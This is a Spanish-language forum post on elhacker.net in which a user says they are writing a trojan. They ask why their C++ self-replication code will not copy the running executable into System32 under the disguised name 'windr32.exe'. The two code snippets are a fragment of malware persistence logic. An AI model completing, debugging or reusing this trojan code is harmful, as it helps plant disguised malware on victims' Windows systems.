Foro de elhacker.net

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: Roast D en 2 Marzo 2017, 18:50 pm


Título: AutoReplica troyano
Publicado por: Roast D en 2 Marzo 2017, 18:50 pm
Buenas a todos estoy creando un troyano. El problema surge en la auto replica, estoy usando el siguiente código en c++ para hacer que se replique en la carpeta system32 pero al parecer no puedo. Puedo copiarlo a diferentes carpetas del sistema pero no a las de windows. El código es el siguiente.

Código
  1. wstring getRuta() {
  2. 	wstring path = _wgetenv(L"windir");
  3. 	path += L"\\System32\\";
  4. 	return path;
  5. }

Acá obtengo la ruta en la que quiero que mi .exe se replique y con la siguiente funcion es cuando hago el copiado.

Código
  1. void copiar(wstring cad) {
  2. 	cad += L"windr32.exe";
  3. 	const wchar_t* camino = cad.c_str();
  4. 	wchar_t buffer[256];
  5. 	HMODULE exe = GetModuleHandle(0);
  6. 	GetModuleFileName(exe, (LPWSTR)buffer, 256);
  7. 	CopyFile(buffer, camino, 0);
  8. }

Como pueden ver obtengo la ruta de mi ubicación actual y me replico en la carpeta de System32. Obviamente esto ejecutando mi .exe como administrado y el retorno de la función CopyFile es 0 por lo que en teoría se copio con éxito. Pero al revisar, no aparece el archivo, funciona bien con otras rutas como en disco local D. Espero puedan ayudarme con esto.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines